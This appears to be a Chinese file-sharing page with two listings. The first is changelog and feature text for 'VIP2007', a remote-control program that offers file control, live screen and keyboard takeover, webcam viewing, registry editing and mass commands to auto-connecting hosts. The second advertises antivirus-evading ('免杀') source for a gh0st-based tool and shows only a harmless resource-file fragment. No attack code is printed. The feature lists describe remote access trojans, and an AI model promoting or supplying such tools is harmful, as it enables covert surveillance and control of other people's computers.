• 原版vip2007Beta2

    2007年02月23号更新!Vip 2007 beta 2 版本 改进功能说明: 1.解决读取不到视频设备信息的问题. 2.加入配置记录 3.其它一些细小改进. 这是VIP2007第二个测试版本,如果你发现这个版本有什么BUG,欢迎您提出:huigezi@vip.163.com 2007年02月18号更新!Vip 2007 beta 1 版本 改进功能说明: 1.VIP2007综合了现有的三个版本优点(VIP2006/1.23/2.03) 2.安装文件从VIP2006的三个减小到2个,一个EXE和一个DLL文件. 3.现在可以支持多操作,如同时下载,上传不会阻塞其它操作. 可查看多台机器视频和屏幕等. 4.配置选项的增加,进程插入类选择,改善了捕获屏幕的速度等. 5.其它一些改进. 这是VIP2007第一个测试版本,如果你发现这个版本有什么BUG,欢迎您提出:huigezi@vip.163.com 【1】对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件(夹),智能断点续传,文件数据加密传输安全简单易用。 【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、窗口管理、服务管理、共享管理、代理服务、MS-Dos模拟,插件管理! 【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能! 【4】视频语音,可以查看远程摄像头!,还有语音聊天功能! 【5】telnet(超级终端). 【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便! 【7】命令广播:可以对自动上线主机进行命令播,如关机、重启、打开网页,筛选符合条件的机等,点一个按钮就可以让多台机器同时关机或其它操作! 【8】服务端可以设为服务启动,支持发送多种组合键,可以轻松管理远程服务器! 【9】远程服务端自动升级功能:远程服务端可以自动升级到最新版本,不需用户手工升级,完全免去重新安装远程服务端升级的烦琐工作! 【10】专用自动上线方式:免去用户要使用WEB空间的烦恼!

    0
    71
    6.95MB
    2010-02-06
    9
  • 娜娜VIP金牌远控最强的

    原码免杀3 TEXTINCLUDE DISCARDABLE BEGIN "#define _AFX_NO_SPLITTER_RESOURCES\r\n" "#define _AFX_NO_OLE_RESOURCES\r\n" "#define _AFX_NO_TRACKER_RESOURCES\r\n" "#define _AFX_NO_PROPERTY_RESOURCES\r\n" "\r\n" "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)\r\n" "#ifdef _WIN32\r\n" "LANGUAGE 4, 2\r\n" "#pragma code_page(936)\r\n" "#endif //_WIN32\r\n" "#include ""res\\gh0st.rc2"" // non-Microsoft Visual C++ edited resources\r\n" "#include ""l.chs\\afxres.rc"" // Standard components\r\n" "#endif\r\n" "\0" END

    0
    155
    1.74MB
    2010-02-06
    9
关注 私信
上传资源赚积分or赚钱